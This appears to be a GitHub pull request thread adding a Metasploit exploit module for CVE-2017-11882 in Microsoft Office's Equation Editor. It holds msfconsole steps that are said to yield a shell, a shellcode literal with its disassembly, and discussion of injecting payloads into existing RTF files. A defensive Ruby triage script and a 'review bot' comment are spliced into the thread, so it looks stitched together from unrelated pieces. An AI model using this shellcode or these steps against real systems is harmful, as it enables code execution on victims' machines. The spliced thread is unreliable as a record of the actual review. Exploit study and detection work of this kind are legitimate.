
CVE-2017-11882 Microsoft Office Memory Corruption #9226

Merged
merged 12 commits into from Dec 5, 2017

Conversation

@ghost commented Nov 21, 2017

PR adds the recent CVE-2017-11882 vulnerability, which allows code execution as the user opening the document. Different from the PoC from Embedi; allows more space.

Verification

List the steps needed to make sure this thing works

  • msfconsole
  • use exploit/windows/fileformat/office_ms17_11882
  • set PAYLOAD [PAYLOAD]
  • set FILENAME /path/to/file.rtf
  • run

Should obtain shell.

Tested

Tested on MS Office 2010 SP 2 Windows 7

@0xIslamTaha commented:

I'm wondering why it should be .rtf file?

@ghost (Author) commented Nov 29, 2017

@islamTaha12 OLE
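As an added example that is not part of this PR or of Metasploit, here is a small Ruby triage script for the defender side of the same RTF/OLE detail: it walks an RTF file's `\object` groups, decodes each `\*\objdata` hex blob as an OLE1 stream and flags objects whose class is Equation Editor (`Equation.3`), the object type this vulnerability is reached through. The sample RTF, the OLE1 header values and the placeholder object body are constructed for the example, and the `\objdata` regex assumes object groups are not nested.

```ruby
# Added example, not code from this PR or from Metasploit: a triage helper that
# lists the OLE objects embedded in an RTF file and flags Equation Editor
# ("Equation.3") objects, the object class CVE-2017-11882 is delivered through.
# All sample data below is constructed for the example.

OLE1_EMBEDDED_FORMAT = 2 # FormatID value for an embedded object in an OLE1 stream

# Return every {\object ...} group in the RTF text as a hash holding the
# \*\objclass name (if present) and the decoded bytes of its \*\objdata group.
# A simple regex is enough for triage; it does not handle nested object groups.
def extract_rtf_objects(rtf)
  objects = []
  rtf.scan(/\\object\b(.*?)\\\*\\objdata\s*([0-9a-fA-F\s]+)\}/m) do |head, hexdata|
    objclass = head[/\\\*\\objclass\s+([^\s}]+)/, 1]
    objects << { objclass: objclass, data: [hexdata.gsub(/\s+/, '')].pack('H*') }
  end
  objects
end

# Parse the OLE1 stream header that \objdata carries: OLEVersion, FormatID,
# then a length-prefixed class name. Returns the class name, or nil when the
# data is too short or is not an embedded object.
def ole1_class_name(data)
  return nil if data.bytesize < 12
  _version, format_id, name_len = data.unpack('VVV')
  return nil unless format_id == OLE1_EMBEDDED_FORMAT
  return nil if data.bytesize < 12 + name_len
  data.byteslice(12, name_len).delete("\0")
end

# Objects whose RTF class keyword or OLE1 class name names Equation Editor.
def flag_equation_objects(rtf)
  extract_rtf_objects(rtf).select do |obj|
    names = [obj[:objclass], ole1_class_name(obj[:data])].compact
    names.any? { |n| n.downcase.start_with?('equation') }
  end
end

# Build one RTF object group with a minimal OLE1 stream: header (version value
# 0x501 is the usual one), class name, empty topic and item names, then a
# placeholder body standing in for the object's native data (no real MTEF).
def rtf_object(class_name)
  cname = "#{class_name}\0"
  body = 'PLACEHOLDER-NATIVE-DATA'
  stream = [0x501, OLE1_EMBEDDED_FORMAT, cname.bytesize].pack('VVV') + cname +
           [0, 0, body.bytesize].pack('VVV') + body
  "{\\object\\objemb{\\*\\objclass #{class_name}}{\\*\\objdata #{stream.unpack1('H*')}}}"
end

# Constructed sample: one Equation Editor object next to a harmless Word object.
def sample_rtf
  "{\\rtf1\\ansi Report #{rtf_object('Equation.3')} #{rtf_object('Word.Document.8')}\\par }"
end

if __FILE__ == $PROGRAM_NAME
  flag_equation_objects(sample_rtf).each do |obj|
    puts "Equation Editor object found: #{obj[:objclass]} (#{obj[:data].bytesize} bytes)"
  end
end
```

Checking both the `\objclass` keyword and the class name inside the OLE1 stream matters because the two need not agree; a document where they differ, or where the RTF keyword is missing entirely, is worth a closer look in its own right.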




def generate_rtf
Contributor commented:

Could this be extracted into something like lib/msf/core/exploit/rtf.rb and take a parameter payload or uri?

This would make malicious rtf file generation reusable and possibly allow for a utility to expand and offer "injection" into existing rtf files.

Author commented:

Yeah, I believe this would be easily possible. Should I put this into that directory, with that name and PR it, with a "command" parameter? @jmartin-r7

Author commented:

If that's what you're implying, unless I'm misunderstanding :D

Contributor commented:

@realoriginal, I would suggest just refactoring this code in a new commit added here, and extracting this method into a utility similar to the other files in the lib/msf/core/exploit path.

Author commented:

Is this still required, since I've now just put an injection style into the module? @jmartin-r7 all good if so

Contributor commented:

Not required from my view, just a preferred item. The injection style you used is specific to how this module functions, with the payload being something of a web delivery. We can open an issue to request a refactor into a utility for rtf, or maybe really in this case OLE, separately. Since @wwebb-r7 has assigned this PR I will defer to him.

@wwebb-r7 wwebb-r7 self-assigned this Nov 29, 2017
header << "000000000000000000000000000000000000000000000000000000000000000\n"


shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00"
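Review bot: the `shellcode` literal mixes non-instruction bytes with instructions, so a single provenance comment will not be enough. The leading `\x1c\x00\x00\x00` is a length prefix and `\x02\x00\x9e\xc4\xa9` is the object's MTEF header; a disassembler run over the whole blob (as in the listing posted later in this thread) labels those bytes as `sbb`/`add`, which is misleading to the next maintainer. When adding the requested documentation, split the literal into a header part and the instruction part, and comment each byte range separately so the reader can tell which bytes are format structure and which are code.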
Contributor commented:

We'll need some documentation or provenance on the shellcode. Either one large block comment or traditional side comments of each instruction. If you reused someone else's and they happen to have that, you can link it and we may be able to push this through and do it afterwards.

Author commented:

No problem, I did use someone else's, and ... I'll go find it :)

Author commented:

Disassembly of the shellcode

    0:   1c 00                   sbb    al,0x0
    2:   00 00                   add    BYTE PTR [eax],al
    4:   02 00                   add    al,BYTE PTR [eax]
    6:   9e                      sahf
    7:   c4 a9 00 00 00 00       les    ebp,FWORD PTR [ecx+0x0]
    d:   00 00                   add    BYTE PTR [eax],al
    f:   00 c8                   add    al,cl
   11:   a7                      cmps   DWORD PTR ds:[esi],DWORD PTR es:[edi]
   12:   5c                      pop    esp
   13:   00 c4                   add    ah,al
   15:   ee                      out    dx,al
   16:   5b                      pop    ebx
   17:   00 00                   add    BYTE PTR [eax],al
   19:   00 00                   add    BYTE PTR [eax],al
   1b:   00 03                   add    BYTE PTR [ebx],al
   1d:   01 01                   add    DWORD PTR [ecx],eax
   1f:   03 0a                   add    ecx,DWORD PTR [edx]
   21:   0a 01                   or     al,BYTE PTR [ecx]
   23:   08 5a 5a                or     BYTE PTR [edx+0x5a],bl
   26:   b8 44 eb 71 12          mov    eax,0x1271eb44
   2b:   ba 78 56 34 12          mov    edx,0x12345678
   30:   31 d0                   xor    eax,edx
   32:   8b 08                   mov    ecx,DWORD PTR [eax]
   34:   8b 09                   mov    ecx,DWORD PTR [ecx]
   36:   8b 09                   mov    ecx,DWORD PTR [ecx]
   38:   66 83 c1 3c             add    cx,0x3c
   3c:   31 db                   xor    ebx,ebx
   3e:   53                      push   ebx
   3f:   51                      push   ecx
   40:   be 64 3e 72 12          mov    esi,0x12723e64
   45:   31 d6                   xor    esi,edx
   47:   ff 16                   call   DWORD PTR [esi]
   49:   53                      push   ebx
   4a:   66 83 ee 4c             sub    si,0x4c
   4e:   ff 10                   call   DWORD PTR [eax]
   50:   90                      nop
   51:   90                      nop

Author commented:

I'll put it next to it

@ghost (Author) commented Nov 30, 2017

Some other information, PDF. https://29wspy.ru/reversing/CVE-2017-11882.pdf

@wwebb-r7 (Contributor) commented:

Nice, thanks. If you don't get around to adding them to the module by tomorrow night, I may do it myself and send you a PR so we can try to get this merged.

@ghost (Author) commented Dec 1, 2017

All good. I should have some time tomorrow morning to do it.

@ghost (Author) commented Dec 1, 2017

Done! :D. Thought I might also try one last thing, to see if I can inject into existing RTFs.

@ghost (Author) commented Dec 1, 2017

Nevermind, figured it out, just had to put return header afterwards.

@wwebb-r7 (Contributor) commented Dec 1, 2017

I had a comment typed out, but let me look over your new commit first

Edit: @realoriginal alright, I was going to suggest an alternate route to get both the rtf injection and the module done separately, but seeing how you're making good progress on it, carry on.

@ghost (Author) commented Dec 1, 2017

:D. Sounds good. Yeah after this is done, I was gonna try and look at putting /lib/msf/core/exploit/rtf.rb something there, which I may need help with, as jmartin said.

@wwebb-r7 (Contributor) commented Dec 4, 2017

A couple of minor things regarding documentation

Office products within the last 17 years allow an attacker to execute arbitrary commands through memory corruption in Office documents.

I'd avoid making relative time references. I'd wager that most would eventually figure it out, but this is potentially confusing to someone looking at this in 2028.

Module exploits a flaw in the Equation Editor, developed
in 2000, that allowed any OLE object to execute in a separate
address space. Compared to original PoC, allows for a command within
a length of 109 bytes to be executed Affects Microsoft Office word for the latest 17 years

Same thing here along with some other grammatical errors and the mention of a separate PoC. The description in the info hash should stick to the formula

This module exploits a (whatever vulnerability class) present in (whatever product along with version). The vulnerability is caused by (root cause) and can be triggered by (whatever the exploit vector is)

or something along those lines. I'm not going to let those hold up merging though. I'll correct them myself later unless you really want to.

@ghost (Author) commented Dec 4, 2017

Ahh, I see. Fixing now.

@ghost (Author) commented Dec 4, 2017

Updated with the appropriate syntax.

@wwebb-r7 (Contributor) commented Dec 4, 2017

Well that was quick, thanks. If I see anything else I'll take care of it.

@ghost (Author) commented Dec 4, 2017

haha thought I'd take a break from the Metasploitable CTF and check on the PRs haha.

Thank you sir!

@wwebb-r7 wwebb-r7 merged commit b96dac2 into rapid7:master Dec 5, 2017
@wwebb-r7 (Contributor) commented Dec 5, 2017

Release Notes

This update adds an exploit for CVE-2017-11882, a memory corruption vulnerability when parsing OLE objects in Microsoft Office
